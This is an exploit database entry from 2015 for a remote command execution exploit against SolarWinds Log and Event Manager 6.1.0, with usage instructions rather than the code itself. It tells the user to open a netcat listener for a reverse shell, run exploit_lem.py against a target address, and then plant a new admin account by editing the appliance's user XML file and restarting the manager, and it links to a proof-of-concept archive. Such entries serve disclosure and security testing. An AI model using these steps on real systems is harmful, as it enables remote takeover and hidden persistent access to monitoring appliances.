Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution Exploit

2015-11-06T00:00:00
ID 1337DAY-ID-24512
Type zdt
Reporter Chris Graham
Modified 2015-11-06T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            Requirements:
 
Python 2.7
netcat
 
Tested on: 
Ubuntu 14.04 LTS
 
Vulnerable Appliance Version: 6.1.0
Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe
 
Instructions:
 
The exploit_lem.py script will need to be run sudo since it uses sockets
which bind to port 21 and 80. These could be changed, but the rest of 
the script would need to be modified as well. 
 
Prior to running the python script, set up a netcat listener for the
reverse shell: netcat -l 4444
 
Example: sudo python exploit_lem.py -t 192.168.1.100 -b 192.168.1.101 -l 192.168.1.101 -lp 4444
 
After access has been gained to the appliance, a new admin user can be added to the web console
by editing /usr/local/contego/run/manager/UserContextLibrary.xml. Simply copy the xml structure 
for the admin user that is already in there and then change the fields to create a new user. In
order to get a valid password hash, use the gen_pass_hash.py script included with this package. 
Please note that a manager restart will be needed before you can login with the new user. This 
can be accomplished by running "/etc/init.d/contego-manager restart"
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38644.zip

#  0day.today [2018-04-08]  #